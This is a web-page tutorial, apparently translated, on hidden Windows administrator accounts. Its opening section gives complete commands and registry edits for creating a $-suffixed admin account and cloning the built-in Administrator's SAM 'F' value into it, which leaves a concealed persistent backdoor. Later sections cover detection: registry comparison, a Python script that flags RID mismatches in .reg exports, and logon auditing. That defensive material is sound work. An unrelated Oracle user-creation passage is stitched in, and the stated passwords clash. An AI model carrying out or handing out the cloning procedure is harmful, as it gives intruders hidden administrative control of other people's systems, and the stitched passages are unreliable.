Create a hidden system user
First, create a new user named sxitn$ (the trailing $ means the account is not listed by the NET USER command); the password is 123:
NET user sxitn$ 123456 /add
Then add sxitn$ to the Administrators group:
net localgroup Administrators sxitn$ /add
Then go to Start → Run, enter Regedt32.exe, and find the SAM key under SAM under HKEY_LOCAL_MACHINE (HKEY_LOCAL_MACHINE\SAM\SAM). Right-click → Permissions; on the Security tab add the Administrators group or the current user, allow Full Control, click Apply and OK, then close the editor.
Go to Start → Run and enter regedit to open the Registry Editor. Find HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$ and note the type shown for the default value on the right, 0x3EF; export this key as sxitn$.reg. Under the Users key, find the item 000003EF and export it as 3ef.reg; also export 000001F4 (the default Administrator item) as 1f4.reg.
Open 1f4.reg with Notepad and copy the "F" value:
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,\
00,00,00,00,00,00,00
Open 3ef.reg with Notepad and paste what you just copied over its own "F" value, in the same position.
Open sxitn$.reg with Notepad and copy:
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):
Paste it at the very end of 3ef.reg. The final 3ef.reg is:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
00,95,7c,4e,2e,20,74
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,\
00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,\
c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,\
00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,\
00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,\
00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,\
08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,\
00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\
00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,\
00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\
01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,\
74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,\
1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,\
bc,1e,8d,15,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):
Save the file, then delete the user sxitn$:
NET user sxitn$ /delete
Then double-click 3ef.reg to import it into the registry. Finally, open Regedt32.exe again, remove the Administrators entry you added on the Security tab of the SAM key, and apply.
The hidden user is now established.
How to view account creation time
1. During installation you set a password; that password is your database administrator password, so be sure to remember it.
2. After installation, once the Oracle database service has started, you can enter SQL*Plus with the following command in cmd: sqlplus sys/password as sysdba
3. After entering the database, create a user with the following commands:
Create user user_name identified by password;
Grant resource, connect to user_name;
4. SQL*Plus can now be entered as that user; in cmd type sqlplus user_name/password
See if a hidden account is added under the WIN2003 server
Removing a registry-type hidden account
Because an account hidden with this method does not appear in the command prompt or in Computer Management, you delete it in the registry. Go to HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names and compare the accounts listed there with the accounts shown in Computer Management; any extra account is the hidden one. Deleting it is also easy: simply delete the key named after that account.
Use regedit to open the Registry Editor.
Find [HKEY_LOCAL_MACHINE] → [SAM] → [SAM] → [Domains] → [Account] → [Users]; the subkeys named with combinations of digits and letters are the SAM entries for all user accounts on your computer.
The sub-branch [Names] holds the user names, each corresponding to one of the SAM entries above.
Finding hidden accounts is just as simple: if two user names compare to the same SAM value, one of them is a cloned account. You can delete that user name here.
It is generally recommended to export the user name entries and the corresponding SAM keys separately and then search for a keyword to compare them; the specific method of comparison varies from case to case.
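The comparison described above can be done offline against an exported .reg file. The following is an added example written for this page, not code from the original post: it parses a Regedit export of the Users branch, reads the RID that every "F" value records at offset 0x30, and flags any Users\RID key whose embedded RID disagrees with the key name (the trace that copying the Administrator F value into 000003EF leaves behind). The sample export is constructed and shortened, not taken from a real host.

```python
import re
# Constructed sample export (not from a real host): 000003EF's F is a copy of 000001F4's F,
# which is exactly what the cloning procedure above leaves behind.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF]
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator]
@=hex(1f4):
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):
"""

def parse_reg(text):
    """Return {key path: {value name: raw value text}} for a 'Version 5.00' .reg export."""
    text = re.sub(r",\\\r?\n\s*", ",", text)  # join hex lines continued with a trailing backslash
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value
    return keys

def f_rid(hex_value):  # RID recorded inside an F value: 4-byte little-endian int at offset 0x30
    raw = bytes.fromhex(hex_value.replace("hex:", "").replace(",", ""))
    return int.from_bytes(raw[0x30:0x34], "little") if len(raw) >= 0x34 else None

def find_cloned_accounts(text):
    """List (key RID, names mapped to it, RID found inside F) wherever the two RIDs disagree."""
    names, suspicious = {}, []
    for key, values in parse_reg(text).items():
        parts = key.split("\\")
        if "Names" in parts and "@" in values:  # Names\<account>: default value type is the RID
            m = re.match(r"hex\(([0-9a-f]+)\):", values["@"], re.I)
            if m:
                names.setdefault(int(m.group(1), 16), []).append(parts[-1])
        elif len(parts) > 1 and parts[-2] == "Users" and "F" in values:  # Users\<RID> record
            key_rid, embedded = int(parts[-1], 16), f_rid(values["F"])
            if embedded is not None and embedded != key_rid:
                suspicious.append((key_rid, embedded))
    return [(rid, names.get(rid, ["<no Names entry>"]), emb) for rid, emb in suspicious]
```

On the sample, the 000003EF key is reported with the name sxitn$ and an embedded RID of 0x1F4, i.e. a clone of the Administrator record.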
There are currently system-level backdoors that automatically delete the cloned account's value here whenever an administrator account logs on, and automatically restore it when the administrator logs off. In that case the clone cannot be found this way. Such a backdoor is generally the work of an expert and is built to avoid detection.
In this case it is recommended to find a professional security specialist to deal with it.
In addition: under Local Security Policy → Local Policies → Security Options you can view the names of the default Administrator and Guest accounts. If the default Guest account has been cloned, the true cloned user name will be shown there.
Computer Management still shows only the normal user, so checking there makes no sense.
Another solution
Start → Run, enter cmd, and run:
net localgroup Administrators
Any member whose name ends with $ is a hidden account.
1. Right-click My Computer → Manage → Computer Management → Local Users and Groups → Users, and check for unfamiliar users.
2. Start → Run → cmd → net user, and check for unfamiliar users.
Hidden accounts do not show up in the two checks above.
3. Start → Run → cmd → regedit, find the registry branch HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ and check for cloned users.
Hidden account whose name cannot be seen
If the hacker has created a registry-type hidden account and, on top of that, removed the administrator's permission to operate on the registry, the administrator can neither delete the hidden account through the registry nor even learn the name the hacker gave it. But nothing is absolute: we can use Group Policy so that the hacker cannot log in through the hidden account. Click Start → Run, enter Gpedit.msc to run Group Policy, expand Computer Configuration → Windows Settings → Security Settings → Local Policies → Audit Policy, double-click "Audit policy change" on the right, check "Success" in the settings window that pops up, then click OK. Make the same settings for "Audit logon events" and "Audit process tracking".
Once logon auditing is enabled, every account logon is recorded, including logons by hidden accounts, so through Event Viewer in Computer Management we can learn the exact name of the hidden account and even the time the hacker logged on. Even if the hacker deletes all the logs, the system still records which account cleared the system log, so the hacker's hidden account is exposed.